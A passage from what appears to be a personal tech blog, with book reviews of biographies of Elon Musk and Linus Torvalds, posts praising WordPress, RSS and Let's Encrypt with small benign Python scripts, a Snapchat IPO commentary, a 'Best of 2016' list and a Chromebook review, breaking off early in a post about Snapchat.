    This book by Ashlee Vance had sat on my wish-list since it came out two years ago. So, long overdue, last week I finally got to it and boy, what a ‘fantastic’ read it is. There is a lot to say about the man, his ideas and the ways he goes about bringing those ideas to life. Whether you like stories about next-level entrepreneurship or bold boyish imagination about where we are moving as a species, this book has it.

    The book has made me even more convinced that Elon Musk might be the most interesting person in the world right now. Here are some observations about his personality from the book.

    Suffering

    • The chapter that stood out most and is most telling about the character Elon Musk is and has, is called: ‘PAIN, SUFFERING, AND SURVIVAL’ . If you only have time to read one part of the book I suggest you read this. This aptly named chapter is an exhibition of almost inhuman effort to will two companies into existence in a period where the world was heading towards the worst financial crisis ever. And not just any plain old companies, but radical, human-life altering companies: SpaceX and Tesla. These were not instant successes and the companies were on the brink of bankruptcy for most of their existence and made Elon the joke of many gossip sites (hard to remember aye?). Building one of these companies would be an insane accomplishment, let alone two. And not just that, but in that same period Musk experienced a great personal tragedy with the loss of a child. His ability to take and take and take and keep going is unparalleled. The man has a very high threshold for suffering. Other examples that underline this are the severe bullying he endured as a child (at school and from his father) and the life-threatening case of malaria he contracted as a twenty-something year old, and the way he dealt with both.

    “It’s how much you can take, and keep moving forward. That’s how winning is done.” – Rocky

    All-in

    • It seems to be all or nothing with Elon Musk. He either loves you or hates you, he either fully commits to an idea or it’s not a good idea. There is no in-between. He is always ready and willing to go all in. After his first company (Zip2) sold for some millions he could have been set for life, but he bet it all on X/PayPal and made hundreds of millions, which he bet again on SpaceX and Tesla and very nearly lost if it wasn’t for some lucky* breaks. (It must be noted Musk seems to defy the meaning of the word luck, his relentless push forward seems to create opportunities that other people might call luck. E.g. being able to buy a brand new $1 billion Toyota factory for $42 million because of the crisis can be called luck, or it could be the result of opportunities that come his way as a result of other efforts.)

    Planning ahead

    • Besides demonstrating near savant-like abilities for memory recollection and his fantastic imagination, Musk has great strategic skills. He is always thinking two or three steps ahead. The end-goal for SpaceX is life on Mars. The intermediate steps to get there are creating re-usable affordable rockets that NASA wants to buy to launch satellites. The end-goal for Tesla is creating affordable EVs for everyone and thereby breaking the world’s dependence on oil. But the intermediate goal is creating low volume high-end expensive EVs to get the cash-flow going to create high volume lower-end EVs.
    • What’s striking is that the things he’s doing with SpaceX, Tesla and SolarCity are things he was already thinking about as a teenager, as anecdotes and school essays will prove. However to start a space company you need a lot of money. Money made by first Zip2 and later PayPal. Intermediate steps. There are always short and long term goals with Musk.
    • In case you missed it: SolarCity is this side company his cousins run, where Musk is the largest investor and acts as an adviser and at the time of writing the book was worth $7 billion alone.

    Man of many talents

    • Besides an ultra rare combination of talents, I would dare to suggest one of his greatest talents is his ability to attract other talent. Yes, he built and is building some extraordinary companies that produce groundbreaking technology every day and transform industries, and he is the main man involved on all levels, from very specific details on welding or software design to high strategic thinking. However, he does not and cannot do this alone, and he knows this. He has a knack for finding and attracting like minded, passionate (near) geniuses. Of course such people seem to rather work for ambitious companies anyway, but still. Finding talent is the most important tool when building a company and Musk knows this.
    • This is not to say he displays a lot of empathy towards personnel. Remember: all or nothing. People come and go as Musk seems to fall in and out of love with them. The most wrenching example of this is a dispute with his former assistant. A woman who managed every aspect of his personal and professional multi-company life, a relationship that ended after 12 years when she made some requests and he deemed her work “not that hard”. They parted and haven’t talked since.
    • Of course there are the comparisons to Jobs and Gates. Like the Tesla is the iPhone with regards to consumer impact. Or that it is very probable Musk will be the richest man in the world in a few years time. Or how the companies Apple and Microsoft bear their maker’s mark. You can make all sorts of comparisons between those men, but in the end they’re not that interesting. Even though Musk does not shy away from attention, he seems to mainly use it as a tool to take companies to the next level. (Btw, the book does a great job explaining why SpaceX is definitely the company that, on many levels, embodies Musk’s spirit the best. From long term goals to dedication to get it done.)
    • Musk also has a low tolerance for fools. He has no time for chit-chat, chomps down food in seconds, and is never in the restroom longer than 3 seconds, 2 of which you need to unzip your pants. He is a man on a mission. A literal mission to Mars.

    All in all this is a well written book, with well researched facts and also not without criticism towards the main subject. But even though he has accomplished so much already, what is most interesting is that this is actually a work in progress. So you can only wonder what the future holds for Elon Musk and therefore the world. And we are all witnesses, which is kind of fun and exciting.

  • Hacker News: sort user submissions by score

    Hacker News is pretty much my go-to site and sometimes I submit links or take part in the discussion. However, when I recently tried to get a list of the links I submitted ordered by Hacker News score, I noticed this is not implemented on the site itself (as far as I can tell?).

    However Hacker News wouldn’t be Hacker News if they didn’t provide an API and access to their data with Firebase. So long story short; here is a small tool where you can enter a Hacker News username and it will give a list of all submissions (stories and comments) by that username ordered by score. Here is the output for my own username.

    (Note: this is written in AngularJS which I know very little about.)

    (Note 2: It works OK for my own username I am not so sure about top ranked users, the dataset may be too large.)
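
    If you would rather script this yourself than use the tool, the same idea is only a few lines of Python against the public HN Firebase API. This is a rough sketch, not the AngularJS code behind the tool; it assumes the requests library, uses “pg” purely as an example username, and fetches items one by one, so it will be slow for very active users:

    # List a Hacker News user's submissions sorted by score,
    # using the API documented at https://github.com/HackerNews/API
    import requests

    BASE = "https://hacker-news.firebaseio.com/v0"

    def submissions_by_score(username):
        user = requests.get(f"{BASE}/user/{username}.json").json()
        items = []
        for item_id in user.get("submitted", []):
            item = requests.get(f"{BASE}/item/{item_id}.json").json()
            if item and "score" in item:          # comments have no public score field
                items.append((item["score"], item.get("title", "(untitled)")))
        return sorted(items, reverse=True)

    for score, title in submissions_by_score("pg")[:10]:
        print(score, title)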

  • Just for Fun: The Story of an Accidental Revolutionary

    Just for Fun: The Story of an Accidental Revolutionary

    This book had been sitting on my to-read list for way too long! But I finally found a second hand copy, so here we go!

    You could say this is the official autobiography of Linus Torvalds, the creator of Linux. The Operating System that changed the world! You can wake me up in the middle of the night to talk about operating systems. So this book is right up my alley.

    It’s funny to think that more time has passed since this book came out (16 years), than the time there was between the birth of Linux and the release of the book (10 years). So an update would be welcome, however history = history and this book does a good job of documenting the rise of Linux. Even in 2001 it was clear that Linux was a huge force to be reckoned with and that it would only grow bigger from there. But I think few would suspect Linux would be the most used operating system in the world (largely) because of smartphones i.e. Android. Because people were still talking about the desktop in 2001.

    Celeb life.

    The book is structured around alternating chapters written by Linus himself and the writer David Diamond. It follows a chronological timeline. From young Linus to Linux, to underground celebrity status, to bonafide celebrity, to riches and world domination. The story is told either in conversation form between David and Linus or as plain old retelling of facts. Because in 2001 things were relatively ‘fresh’ the book has some nice intricate details. Details that would probably be lost when you write a book about this subject 20 years from now. And that is probably what I liked most about it. I was familiar with most of the history, but this book does a great job of filling in the details to get a complete picture from a first degree account. Also, there is quite a bit of room towards the end where Linus shares his thoughts on Intellectual Property, copyright and becoming rich (not Bill Gates rich, but still rich). Which was really interesting!

    Here are some take-aways from the book:

    • Linus is of course a programming genius. He wrote Linux when he was around 21. I would guess only a handful of people in the world were able to do what he did. And he did it at a young age. (He probably wouldn’t like this comparison, but it reminded me a lot of Bill Gates, who wrote a BASIC interpreter when he was even younger.)
    • But the genius also manifests itself in the ability to make good design calls (very early on). I would even go so far as to state that his programming ability is surpassed by his talent to make the right choice (design, technical etc.)
    • He has proven this again, by unleashing git (the software versioning tool) to the world in 2005. Which made quite an impact on software development in general (e.g. it gave rise to GitHub). So not only did he start one of the first software revolutions, he also started the second! With git he doubled down on demonstrating the knack for making the right choices.
    • Even though he famously fell out with professor Tanenbaum, I love that he still names Tanenbaum’s book Operating Systems: Design and Implementation as the book that changed his life.
    • He comes from a journalist family who were straight-up communist sympathizers and part of a Finnish minority that speaks Swedish. They also dragged young Linus to Moscow on occasion. And his grandfather was a bit of a famous poet in Finland.
    • With this communist background in mind it is funny to think he is very much a pragmatist and not an idealist. But maybe exactly because of this. It’s a very conscious decision and he seems to have thought about it a lot and it permeates everything he does.
    • There is a lot of self-deprecating humor in this book.

      Linus Torvalds and Richard Stallman
    • There are quite a few sexual references. Linus starts the book with stating his view on the meaning of life: using sex as example.
    • The Tanenbaum discussion was about technical choices. The success of Linux sort of gave Linus the upper hand in the discussion. I think this irked Tanenbaum but I also suspect Tanenbaum felt that if he had just released his OS Minix to the world in the same manner Linus had, we probably wouldn’t have had Linux.
    • Stallman gave a talk at Linus’ university about GNU and this led to Linus choosing the GPL as the license. And of course gcc (developed by Stallman) was the compiler Linux was built with.
    • And this is key, Linus acknowledges this, his project came at the exact right time. A year later and someone else would probably have already done it. Or we would all be using *BSD (who were still fighting other battles). A year earlier and no-one would have batted an eye, because too few people were online to notice.
    • So the timing consists of 3 factors coming together: hence the word timing. The GNU GPL (invented by Stallman), the availability of cheap 386 processors and the internet. Take away any one of them and things would be different.
    • Most of all I think that the internet was key, because Linus found his co-creators and feedback there. But also because Linux became the de facto operating system for internet servers and was born around the same time the www was born. This is no coincidence. The internet and Linux grew up together.
    • Also one last point that proves he has good gut feeling, in 2001 he predicted the ubiquity of the smartphone:

    The title of the book is ‘Just for Fun’. And it is written with room for jokes and lighthearted thoughts. But there is also plenty of serious thought on ideals and pragmatism. But fun is the general theme throughout Linus’ life and the development of Linux. The fun that you get from following your curiosity, working hard on making it happen, and caring about what you do. The pragmatic approach of Linus to everything he does seems to create a sense of flow and he follows that flow and has fun with it. This is also backed by how an enormous project like the Linux kernel, which is the biggest software project in the world, is managed. The loose structure that dictates the development comes from flow.

    So all in all it’s a very fun book to read! Even if it’s from 2001 and a lot has happened since. I think there could be an updated version. Or you could ask yourself: “who, in 2017, is the equivalent of 1991 Torvalds?”. So, whose biography will we be reading in 10 years time? My money is on Vitalik Buterin (literally, I own Ethereum). He is a current day one-of-a-kind genius whose technology will probably change the world. Get it?

  • WordPress is amazing!🔥

    This blog is powered by WordPress. That means that the content you read was edited in the WordPress administrative interface and that same content is now presented to you by the WordPress engine!

    WordPress powers 24% of the web. And for good reason. It is amazing. It is free, fast and easy!

    When I had to pick a CMS for my first blog in 2005, it was a different world. It seemed that anybody who had read a PHP tutorial had also subsequently written their own CMS. There were just so many! And there was no clear winner, but there was WordPress 1.5.

    WordPress had only been around for 2 years, but it looked very promising already. I don’t remember there being one distinct reason, but I do remember that the clean and straightforward approach was what made it stand out from the others.

    One little bit of proof of this: the WordPress admin backend looks (to me) pretty much the same as it did back in 2005. Which says a lot about someone making the right design choices from the get go (or: making the right incremental improvements without breaking UX).

    Automattic and Matt

    I value the open web. And it is clear to me that the open and free web needs an open and free CMS. This is an integral part of it. And with the presence WordPress now has, it is a vital cornerstone of the open web. But there are and were dozens of CMSes, most even older than WordPress, all clawing for the number one spot. Which is great and exactly the freedom the open web provides and thrives on. But it does raise the question what exactly it is that made WordPress take the number one spot? I can only speak from my own experience that using WordPress is a joy, and more people probably have that same experience. And yes, I have used others and still sometimes have to, for various reasons. And every time I do I am reminded just how wonderfully elegant WordPress is. And I don’t want to overanalyze, but I would suggest this elegance has a lot to do with Matt Mullenweg. The creator of WordPress.

    Matt comes across as a very level-headed guy with a clear vision. A vision that has enabled him to grow this GPL (open and free) product of his into a billion dollar company with over 500 employees (yes, that’s possible!). He is around the same age as that other multi-billion-dollar company guy, but I would think the similarities end there. One guy provides free and open technology to enable people to express themselves, the other provides technology for free (which is quite different) that people use so his company can sell more ads (yes, I am deliberately putting it somewhat bluntly).

    Here is a nice interview with Matt, but I can also highly recommend his several appearances on the Tim Ferriss show (a podcast):

    Static blogs

    So it was a no-brainer when I had to pick a CMS for this blog. However I also like experimenting, and static site generators are all the rage right now and they certainly do have an appeal. And mainly for two reasons: speed and security. But WordPress is fast enough for my needs, so there goes that reason. And also WordPress itself is pretty rock solid. Most security problems are related to third party plugins, not the core. (I 💖 the auto-update feature that WordPress introduced in version 3.7). And lastly there are just so *many* great, free templates available for WordPress, that no static site generator could compete (yet). So, I’ll stick with WordPress, which is amazing!

    So here’s to Matt and Automattic 🥂. Thanks for keeping the web open, free and empowering the people!

  • Thoughts about the Snapchat IPO👻

    Last year I wrote about Snapchat and their unique approach to things. I’d like to think that my predictions at the end of that blog came true 😎. Why? Because we see Instagram betting big on streaming and disappearing video i.e. copying Snapchat features. If anything, it’s proof Snapchat is a force to be reckoned with. And they seem to be making Zuckerberg & co. nervous.

    So it’s not unexpected that the Snap Inc. IPO (their new name to separate the business from the app) is right around the corner. And their S1 filing offers some curious insights. Mostly about their technology.

    People like to make comparisons with the Facebook and Twitter IPO. Facebook as a good example, because Facebook is still growing and posting big numbers. Twitter as a bad example because Twitter is struggling a bit and has less overall users. For the sake of argument let’s compare it to Facebook.

    I’ve always been somewhat skeptical about Facebook, but I have been proven wrong time and time again. Firstly, if you had asked me “will people put their entire personal lives online without any reservation?”, I would have answered: no. I was wrong, of course. Secondly, when the Facebook IPO was coming up, I thought, surely it can’t be worth that much. I was wrong again. I have no problem being wrong, as long as I can learn something from it.

    And what I learned from this and what took me some time to realize, is Facebook is not about picture profiles. It’s about three other things:

    1. Facebook is, like Google, about selling ads. Yes, there is a lot of money in ads.
    2. Facebook was very smart in spending their IPO money. Among other things they bought WhatsApp: best app since sliced bread. And they bought Instagram: which in my opinion is best deal on the internet since Google bought YouTube.
    3. Facebook is a technology company, and this is very important. They, just like Google and Amazon, have been able to grow their business because of unique in-house developed technology. People don’t realize this enough, but you couldn’t just download a tool to index the entire web and make it searchable. Or buy some software to connect 2 billion people together, or just get an off-the-shelf infrastructure where you can upload 300 million photos every day. You had* to think up, create and develop the tools, infrastructure and everything around it (storage, computing etc.) yourself. And you needed this level of technology as an enabler for your service just as much as you needed it to provide the competitive advantage to stay ahead of the competitors. I’d argue that the technology was often the difference between success and failure. MySpace couldn’t keep up with Facebook. Just like Altavista and Yahoo couldn’t keep up with Google. And Google realized they couldn’t keep up with YouTube so they bought it. Amazon is another example. Sure, they sell books and everything else. But behind the scenes Amazon is a tech company that has developed a lot of technology to enable being the biggest online warehouse. (Amazon has been smart about this and the way I see it their AWS product basically started as a rebranding of in-house developed technology. Google is doing the same now with Google Cloud.)

    So back to Snap Inc. Number 1 is pretty clear, right? Even though I think targeting Snapchat users is harder than targeting users on Facebook or Google, because I think they have less info on their users. But still, ads will be very good business for them.

    I can also see number 2 happening: getting a few billion dollars will enable you to buy other companies and branch out or pivot. So this is probably what will happen. But number 3, this is where it gets interesting.

    From this post, titled “Snap commits $2 billion over 5 years for Google Cloud infrastructure”, it became clear that Snap doesn’t have a lot of their own (infrastructure) technology. And they are not planning on building it either. So they depend on another company (Google!) for this.

    You can kind of guess the sort of responses to this. Hacker News, of course, has plenty of those. A lot of the reactions are more or less centered around “See, this is all just blowing smoke! They are not a real tech company, they are too dependent on Google! How will they ever have a competitive advantage?” etc. This all seems to sound reasonable when you indeed compare Snap to Facebook. However, there are two reasons we shouldn’t do this.

    1. Snap is known for doing things differently. And this fits right in there. The only thing you can conclude from it, I think, is that it defines them as a service or media company as opposed to a tech company. And this is not necessarily a bad thing. Just different. But it is a very important difference, because comparing them with Facebook is like comparing apples and oranges. Apart from certain similarities, it’s specifically this difference that makes both companies fundamentally different. Facebook is a tech company that gets its edge mainly because of the technology (the world has never seen such a huge interconnected network before). Snap is more of a media company, that gets its edge because of a different kind of user experience (Snaptacles anyone?).
    2. Another aspect is that (infrastructure) tech is becoming more ubiquitous. Yes, when Google, Facebook and Amazon started you needed to develop the tech yourself (*see above). But nowadays it’s much easier to buy/outsource critical infrastructure and focus on what you do best. And it’s clear Snap is doing just that. And this is a change from what we’re used to: that a web company needed to be a tech company, that the tech is what set you apart, and that you needed to own and control the whole tech stack. Nowadays you don’t need to own the whole stack; you have to decide what tech you have to develop yourself and what tech you can (or need to) outsource. With Google and Amazon you can just rent complete data centers without having to patch one cable yourself. Things have changed.

    After the IPO the main focus for Snap will probably, still, be growth. So my guess is Snap will start buying companies. And you either buy technology to enable further growth, or buy (growing) communities with lots of users. I think Snap will focus on the latter and will start buying and creating different user/media experiences and grow from there. Because this is simply closest to what they are. They are not a classic “tech” company and they know this. However, they could still buy and try to become a more real tech company. They have the cash, but it would surprise me because it’s different from what they are or do. Either way, I am not betting against them. I have been wrong too often to do so.

  • I still love RSS (you can too!)

    RSS. It’s kind of a weird acronym and people can’t even seem to agree on the true meaning behind those three letters. It doesn’t sound too sexy, but it does sort of have a recognisable logo. If you have seen this logo before and wondered what it is, well, this post is for you!

    TL;DR: RSS is a specification that will allow you to keep track of all your favourite sites in one place.

    RSS has been around quite some time, long enough for people to try and kill it. But RSS is still around and one of the main pieces of technology that make the web great. It’s easy and simple and you can use it too!

    Forget the name for a minute. Say you like certain sites; you could check each site every hour for updates, but you will find that most times there isn’t anything new. Wouldn’t it be great if you could go to one place that tells you which of your favourite sites have updates?

    Well this is what RSS can do for you! How?! Glad you asked!

    Behind the scenes

    Most sites look different: some have the news at the top, some on the left, some have pictures that you have to click. This is great, every site has its own unique identity. But let’s think about this for a second: no matter where the news is or how you get there, in the end most of it is just text. You know, words, sentences, things you can read! As you are doing right now. What if this text from all your favourite sites were organised and presented in a uniform manner? When every site abides by the same rules, it would make it easier to fetch and present this content, right?

    Well, RSS is just that: it is a specification for how a website, news site or blog (or anything that creates content, even podcasts) can offer its content. Technically, this content is in XML format, but you can forget that right away. What’s important here is that because sites agree on a specification, it becomes possible for a tool to read these XML files and present the updates to you. Pretty much like an e-mail program: all your new e-mail is in one place for you to check. Or like a Twitter feed: you don’t check people’s individual Twitter pages for updates, you have a feed, a reverse chronological collection of all updates of people you follow. So think of RSS as a way to get one chronological timeline of updates for all your favourite sites.
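
    If you’re curious what a reader does with those XML files behind the scenes, here is a minimal sketch in Python. It assumes the third-party feedparser package (pip install feedparser), and the feed URLs are just hypothetical examples; a real reader does a lot more (caching, read state, retries).

    import feedparser
    from time import mktime
    from datetime import datetime

    # Hypothetical list of feeds; replace with the sites you actually follow
    FEEDS = [
        "https://www.piks.nl/feed/",
        "https://example.org/rss.xml",
    ]

    items = []
    for url in FEEDS:
        feed = feedparser.parse(url)  # fetch and parse the XML feed
        for entry in feed.entries:
            # not every feed sets a parsed date; fall back to 'now' if it is missing
            ts = entry.get("published_parsed") or entry.get("updated_parsed")
            when = datetime.fromtimestamp(mktime(ts)) if ts else datetime.now()
            items.append((when, feed.feed.get("title", url), entry.get("title", ""), entry.get("link", "")))

    # one reverse chronological timeline for all your favourite sites
    for when, site, title, link in sorted(items, reverse=True):
        print(f"{when:%Y-%m-%d %H:%M}  [{site}] {title}")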

    RSS readers

    Sounds great! I want such a tool!

    Awesome! Well, there are a whole bunch of tools available. Because RSS is an open format, there are 1001 and more implementations. You can get RSS readers for your phone, desktop computer or use a website (self-hosted or not). I myself use theoldreader.com: I added a bunch of sites and theoldreader.com will periodically check those sites for updates. So I don’t have to visit the sites myself, I just visit one site (theoldreader.com) and it presents me the updates. At the moment I follow around 100 sites this way. Imagine having to check 100 sites every day! Now I just get the updates for all of them in one place.

    Looks a bit like this.

    I find it especially great for blogs or sites that don’t update that often. My most favourite/visited sites aren’t even in there because I visit them often enough or they have too much content anyway. I’m looking for the news pearls, things that might not be in the main news, or great bloggers that don’t update frequently.

    So if RSS is so great, then why…?

    I know what you’re about to ask. But nobody owns RSS. Not Facebook or Google or Apple. It is just an agreement on how to present your content. And most sites really do offer their content in this RSS format, and refer to it as an RSS feed. You can usually find it by clicking the orange logo, but most RSS readers will automatically find the feed for you. (You might also notice RSS2, RDF or Atom feeds; for now you can think of them as the same thing). It comes standard with almost all CMS’s. So if you write a WordPress, Joomla or Drupal blog or even a Tumblr, you might not even know it, but your content is already available in RSS. For instance, this is the feed for this site. You would probably have to explicitly disable it if you really don’t want it. But why would you want to do that? RSS is such a great way for people to keep track of your site, right?
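
    That automatic discovery works because most CMS’s advertise their feed with a <link> tag in the page’s HTML head. A toy sketch of the idea in Python (standard library only; piks.nl is just used as an example page, and real readers handle far more edge cases):

    from html.parser import HTMLParser
    from urllib.request import urlopen
    from urllib.parse import urljoin

    FEED_TYPES = ("application/rss+xml", "application/atom+xml")

    class FeedFinder(HTMLParser):
        """Collect the href of every <link rel="alternate"> tag that points to an RSS/Atom feed."""
        def __init__(self):
            super().__init__()
            self.feeds = []

        def handle_starttag(self, tag, attrs):
            a = dict(attrs)
            if tag == "link" and (a.get("rel") or "").lower() == "alternate" and a.get("type") in FEED_TYPES:
                self.feeds.append(a.get("href"))

    page = "https://www.piks.nl/"  # any site you want to follow
    html = urlopen(page).read().decode("utf-8", "replace")
    finder = FeedFinder()
    finder.feed(html)
    print([urljoin(page, href) for href in finder.feeds if href])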

    But here’s the thing: most sites actually want you to visit, so they can show you ads. Left, right, on the top and bottom of the content you are there to read. And (therefore) most sites want as many visitors as possible. When you read their content somewhere else, this means no visitors and no ad clicks. So offering an RSS feed can conflict with their business model. Some sites let their RSS feed offer just titles, and you still have to click through to the main site; some embed ads in the RSS content. But even so, most just offer the article/update and you never have to visit the site. If your goal is getting your content out there, RSS works perfectly and it makes the web more decentralised (always a good thing). But if your goal is showing ads and generating a lot of traffic, it might be a conflict of interest.

    Sites like Facebook never want you to leave, all news and content is on their site. It’s their bread & butter. But even they offer (limited) ways to present/create RSS feeds.

    So, RSS is amazing, even though it might sometimes conflict with a site’s interest. I understand, and I am not advocating solutions here. I’m just here to promote RSS, I love it, always have. And I know so many people that don’t know what it is, so I hope this helps!

  • Let’s encrypt all the things!

    You may notice something different on your favourite blog. Left of the URL in the address bar there is a little green lock! This means piks.nl is now served to you via SSL/TLS. You know, https:// instead of http://. This means the connection, and therefore, traffic between you and the website is more secure, because it is encrypted.

    This was way overdue, even more so because it’s oh so easy now with Let’s Encrypt.

    Let’s Encrypt

    Let’s Encrypt offers free and automatically renewable SSL/TLS certificates for everyone. Certificates have been around a long time and are part of a secure internet, but 4 things were always a hassle:

    1. Certificates cost money.
    2. Certificates expire and renewal is something you have to plan/take care of. It’s not automatic.
    3. Validation is a bit of a pain (sending and replying to specific emails).
    4. Configuration is a lot of pain (webserver dependent, a lot of different files, creating, moving, copying etc.).

    Let’s Encrypt solves all of these problems. 

    I also run a couple of webshops so having certificates was kind of a big deal. And I had the first certificate running in 15 minutes. Pretty neat! I should have done this earlier.

    What makes it so easy is mainly this great tool that Let’s Encrypt provides: certbot.

    This bot takes care of (automates!) all the steps; there is always a manual override if you’re that kind of person. You download the bot, unpack it, run it, follow the configuration steps, and the bot will create the certificates, even update your Apache (webserver) configuration and reload the webserver, and you’re done. You have to do very little.

    After that you can set your cron/systemd config to automatically renew the certificates for you. Certificates expire, that’s sort of part of what makes them secure.
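
    Once that cron/systemd renewal is set up it should take care of itself, but it doesn’t hurt to check now and then. Here is a minimal Python sketch (standard library only; piks.nl is just an example host) that tells you how many days a site’s certificate has left:

    import socket
    import ssl
    from datetime import datetime, timezone

    def days_left(host, port=443):
        """Connect over TLS and return the number of days until the certificate expires."""
        ctx = ssl.create_default_context()
        with socket.create_connection((host, port), timeout=10) as sock:
            with ctx.wrap_socket(sock, server_hostname=host) as tls:
                cert = tls.getpeercert()
        # 'notAfter' looks like 'Jun  1 12:00:00 2025 GMT'
        expires = datetime.fromtimestamp(ssl.cert_time_to_seconds(cert["notAfter"]), tz=timezone.utc)
        return (expires - datetime.now(timezone.utc)).days

    print(days_left("piks.nl"))  # e.g. 61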

    What more can you ask for?

    So what?

    Why would I need this? Well, 2 reasons:

    1. As said, I also run a couple of webshops. Having your customers send their personal/order/account/credit card information over an unsecured connection is not really something you want in 2017 (or, you know, ever).  Sure, a blog doesn’t typically handle customer information, but it’s still relevant. Also, because:
    2. Google will start (or already is) ranking SSL/TLS sites higher. So it helps if you want your site to rank well in Google. SEO baby!

    So having a certificate is not only more secure but it’s also a sort of a quality stamp for your site.

    Why should I trust Let’s Encrypt?

    You don’t. You can still buy and manage certificates from regular SSL providers. No problem. If you’re sceptical about LE, you can read a little bit about them here or here. But I highly recommend it.

  • Best of 2016

    Best-of lists signify another year is coming to a close. People feel a need to sort and order things to make room for what is to come. Or something like that.

    So here is an assorted list of best new things I found in 2016. Things can be anything, as long as it was new to me in 2016. Feel free to share your list in the comments.

    Best new app

    Google Photos turned out to be a real improvement in photo management. It saves space on your phone and, more importantly, you can search through photos because Google AI indexes them (and every face in them) for you. Picture of that meeting last month? Coming up! Picture of your kid on a swing? Say no more fam, I got you. You should give it a try, it works pretty great. (Be sure to read the T&C if you have privacy doubts).

    https://www.youtube.com/watch?v=aEK37MBTUPk

    Best new podcast

    I have listened to 316 podcasts this year. I ain’t lying, it was kind of my thing this year, I even started my own podcast with a friend.

    But apart from that, the “How I built this” podcast is hands-down the best new podcast I found this year. Every episode is interesting. No duds so far. It’s always a great story of one or more entrepreneurs on how they got started. And there has been a wonderful selection of guests already. This show is fun and you really learn something every time (but learning is fun ammirite?!).

    Best new music

    Usually I compile a list of best new music discoveries. I might still do that. But for now I’d like to point out one genre, that was newish to me: Dark Wave. Taking new wave a bit further. Not for everyone, I know.

    Best book

    Even though I just started this one and haven’t finished it yet, I still think Shoe Dog: A Memoir by the Creator of Nike will be my favourite book of 2016. Boy, this is something else. And right up my alley: life lessons, entrepreneurship, sports, passion. It speaks to me. You learn something, you feel you understand things better after reading. At least so far; I might blog about it after finishing (or, you know, podcast about it).

    Best game

    Probably Sniper Elite III. I only played a few games this year, but this one was fun. Sneaking and sniping Nazis in the African desert. Not too much backstory or immersion, just what I like for now.

    Best movie

    The Big Short. A piece of recent real history portrayed by great actors. Yes, in a Hollywood fictional sort of way, but that didn’t bother me.

    TV shows are missing from this list, because there just weren’t any that I think I’d like to recommend. But I have seen more episodes of Flip or Flop than you would guess. Probably because we bought a new house ourselves and did some work on it.

     Best article/site

    Not so much an article as a guy who writes them. I think I must have stumbled on Derek Sivers and his braindump sivers.org a few times already before 2016, but it didn’t stick or I didn’t see the bigger picture. This year it did: you can really learn a lot from this guy, who built and sold his company and didn’t keep a penny. He writes interesting articles, some of which have been compiled to read as a book. Highly recommended.

    (That reminds me, I probably also should start tracking favourite quotes.)

    Best video

    I watch and like a lot of YouTube, but I have never liked (you know, like-like) a YouTube video in my life. So picking one is hard because there is no log. So this is a placeholder for myself to keep track of this. The same goes for gifs, also moving images. I probably have seen more gifs than videos, and that’s saying something 😉

    Best new gadget

    My Chromebook. I did a blogpost on it. But my Tascam DR-40 and Logitech MX Master are close runners up. Oh and I started driving one of these, which is also a nice piece of technology.

    Best tweet

    For this last one, I’m going to be unapologetically selfish. Yes, with all the political drama this year there were a lot of interesting or funny tweets. But this tweet is mine, non-political and my favourite:

  • My Chromebook Acer C730E-C480 review

    Last week Google was kind enough to provide me a Chromebook. I had been eyeing one for some time, but I had no reason why I would need one. I have a laptop, smartphone and a tablet. So what would a Chromebook add? Well, now I know.

    TL;DR: I love the Chromebook!

    The good

    Reasons are actually pretty obvious. It is a laptop, but it is light, small, cool, quiet and has incredible battery life! Especially the last aspect is a main selling point for me. Also, I am a laptop guy. I need to Alt-Tab, Ctrl-T, Ctrl-W and use Esc to feel productive, and preferably on a physical keyboard. This is why a smartphone and tablet always feel like a second-best thing to me. I use those when I can’t use my laptop. But my laptop is heavier and I need to carry a power supply with me (mind you, I’m talking about Dell and Lenovo; MacBook Air users probably have different mileage). With this Chromebook I only needed to plug it in once, in three days! So it felt like using a laptop but with smartphone battery life. Also the instant sleep on close and instant-on function is something I really love.

    There are enough USB ports, an SD card reader, HDMI output and a 3.5 mm jack.

    Apart from that it is fast enough and I can do about 95% of everything I normally do on a laptop. Most things are done in the browser anyway. And there is even an SSH client, which makes it even better.

    https://www.youtube.com/watch?v=e_C5MkmJq4E

    The less good

    The trackpad is probably the worst part of this laptop. Edit: after a week or so, and figuring out the 2- and 3-finger gestures, it is actually pretty amazing.

    But, see above, I am a keyboard user. And the keyboard is OK, though I do miss a keyboard backlight. And yes, the screen could be a bit bigger, but that is always the case, for every laptop I have ever owned. It did crash on me once, but I might not be a typical user. I did have to google how to reboot it though.

    Editing a document (in Office, not Google Docs), using GIMP, downloading torrents or editing podcasts is not possible. There is a file browser, but it doesn’t really allow external programs to edit files. So it is very much a tool for consumption, less for creation. Unless, that is, of course, you’re writing blog posts 😉

    The worst part is probably that without Wi-Fi it becomes pretty much unusable. But what do you expect?

    Note: I understand very well how Google tries to push the user and their data into using their ecosystem (mail, docs, storage etc.) but if you know what you’re doing it’s fine and you are not limited by it. The Chromebook is the culmination of everything Google is trying to do. From a browser (Chrome!), to Office in the cloud, to Google Music to Google Hangouts to Google Photos and more. The Chromebook ties it all together.

    Conclusion

    The first thing I googled when I got it was how to put Linux on it. But that seemed not that trivial, so I thought: let’s give it a shot as-is. And here is the thing: I have not used or even opened my real laptop since I got the Chromebook. This is huge. I get it now.

    The Chromebook is an eye-opener for what I actually use/value/need from a computer.

    For me that is a physical keyboard, a browser, an SSH client and a lot of battery life. This is probably the first computer I own where I don’t know the CPU or the amount of RAM. So things change. And a Chromebook might be just the right kind of change.

  • Snapchat

    Snapchat is everywhere these days. And with everywhere, I mean a lot of people are talking about it like it’s some sort of elusive enigma only the young kids are able to tune in to. The digital equivalent of high pitched notes.

    What makes it so hard to grasp, what’s different about it and what’s important about it? Let’s dissect, shall we?

    Different

    Snapchat is unlike any other application that you’re familiar with. Even though most applications you use wouldn’t make sense to someone 15 years ago, your mind has already been trained to expect certain comparable things from modern social web applications. Call it a context. And when using Snapchat this context is missing. Because it is simply not there:

    • There is no number of likes
    • There is no number of views/loops/retweets
    • There is no number of following/friends/followers
    • There is no record of older posts (snaps)

    So everything you have created or accumulated is not important. Snapchat does keep certain scores, but that’s not the main focus. The main theme with Snapchat is that everything will disappear. What is important, and the only thing that matters, is capturing, sharing and being in the moment. No other app has such a strong emphasis on the now.

    The other thing that makes Snapchat different is: content creation. The app is very serious about this. The very first thing you will see when opening the app is the camera for making a snap. You can swipe right to see personal snaps from friends or left for stories. But you cannot make either of these your default start screen. Snapchat wants you, invites you, forces you, begs you, facilitates you to create and participate. No other app does this so explicitly.

    Background

    My first Snapchat experience was a couple of teenage relatives who would take my picture, draw something inappropriate on it, send it to each other and have the best time. Curious!

